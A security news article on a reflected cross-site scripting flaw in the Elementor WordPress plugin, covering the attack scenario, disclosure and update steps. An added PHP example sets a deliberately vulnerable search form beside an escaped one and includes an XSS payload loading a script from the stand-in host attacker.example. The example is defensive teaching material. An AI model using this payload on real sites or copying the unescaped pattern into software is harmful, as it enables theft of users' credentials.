Vulnerability in Elementor, page builder plugin, affects more than 4 million WordPress sites

When a new security flaw is reported in a software product, a race starts between the vulnerability testing experts responsible for fixing it and the cybercriminals who want to exploit it. This is especially notable for the most widely used products, such as popular WordPress plugins.

Elementor, one of the world's most popular WordPress plugins, is affected by an authenticated reflected cross-site scripting (XSS) vulnerability. Exploiting it would allow threat actors to have a script, served from a site they control, run in a victim's browser in the context of the vulnerable WordPress site, where it can carry out malicious activity such as theft of access credentials. "Authenticated" here means the reflecting page is only reached by a logged-in user, so logged-in users of the site are the targets.

Vulnerability testing experts explain that the flaw depends on the vulnerable site reflecting attacker-supplied input back into a page without adequate escaping, for example through a search box. A possible exploitation scenario is described below:

  • The threat actor crafts a URL for the vulnerable site that carries the script payload in a reflected parameter
  • The threat actor sends that link to targeted users of the site
  • When a victim follows the URL, the injected script, which can be hosted on an external site, runs in the victim's browser within the attacked site and can steal the victim's credentials for it
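
As an added illustration (this is not Elementor's code and does not reproduce the reported flaw), the generic reflected XSS pattern the scenario above relies on is shown beside its hardened form, which uses WordPress's own escaping helpers. The parameter name s, the markup, and the attacker host are assumptions for illustration; the function_exists stand-ins only let the file run under plain php outside WordPress and approximate the real helpers.

```php
<?php
// Added example, not from the original article or from Elementor.
// Shows the generic reflected-XSS pattern (input echoed unescaped) and the
// hardened form that escapes on output for the context it lands in.

// Stand-ins so this file also runs under plain `php` outside WordPress.
// Inside WordPress the real functions exist and these blocks are skipped.
// (Assumption: approximations of the WordPress helpers, not their exact code.)
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $s ) { return htmlspecialchars( $s, ENT_QUOTES, 'UTF-8' ); }
}
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $s ) { return htmlspecialchars( $s, ENT_QUOTES, 'UTF-8' ); }
}
if ( ! function_exists( 'wp_unslash' ) ) {
    function wp_unslash( $s ) { return stripslashes( $s ); }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( $s ) { return trim( strip_tags( $s ) ); }
}

// VULNERABLE: the query-string value is written straight into HTML, so a crafted
// URL such as /?s=%22%3E%3Cscript+src%3D...%3E carries a payload that the
// victim's browser executes in the context of this site.
function render_search_vulnerable( array $get ) {
    $term = isset( $get['s'] ) ? $get['s'] : '';
    $html  = '<form method="get">';
    $html .= '<input type="text" name="s" value="' . $term . '">';   // attribute context
    $html .= '</form>';
    $html .= '<p>Results for: ' . $term . '</p>';                     // text context
    return $html;
}

// HARDENED: normalise the input once, then escape for the context in which it
// is printed (attribute vs. text node). Escaping on output is what stops
// reflected XSS; sanitize_text_field() on its own is not a substitute.
function render_search_hardened( array $get ) {
    $term = isset( $get['s'] ) ? sanitize_text_field( wp_unslash( $get['s'] ) ) : '';
    $html  = '<form method="get">';
    $html .= '<input type="text" name="s" value="' . esc_attr( $term ) . '">';
    $html .= '</form>';
    $html .= '<p>Results for: ' . esc_html( $term ) . '</p>';
    return $html;
}

if ( PHP_SAPI === 'cli' ) {
    // Constructed payload: what the crafted URL's query string decodes to.
    // It closes the value attribute and loads a script from an attacker host
    // (attacker.example is a reserved name used here as an assumption).
    $payload = array( 's' => '"><script src="https://attacker.example/x.js"></script>' );

    echo render_search_vulnerable( $payload ), "\n"; // a live <script> tag reaches the browser
    echo render_search_hardened( $payload ), "\n";   // the tag is rendered as inert text
}
```

Run it with `php file.php` to compare the two outputs; in the vulnerable output the attribute is closed early and a real script element follows, while the hardened output keeps the whole string inside the attribute and the paragraph as escaped text.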

This flaw has already been recorded in the WordPress Vulnerability Database, a platform that tracks vulnerabilities found in the content management system and its most popular plugins. Its administrators stated that, to avoid exploitation in the wild, the proof of concept will remain unpublished until at least February 12.

The vulnerability was found by the security firm Impenetrable.tech, which reported it to Elementor's developers promptly. The developers of the visual builder fixed the flaw immediately, and the vulnerability was publicly disclosed once the fix had been released.

Specialists in vulnerability testing from the International Institute of Cyber Security (IICS) note that the flaw affects Elementor versions 2.8.4 and earlier; version 2.8.5 contains the fix. Update from the admin interface of the WordPress site: after logging in, the dashboard shows an update notice for the plugin; otherwise, update it from the Plugins entry in the administrator sidebar. Check the installed version on that same Plugins page to confirm the site is no longer on 2.8.4 or earlier.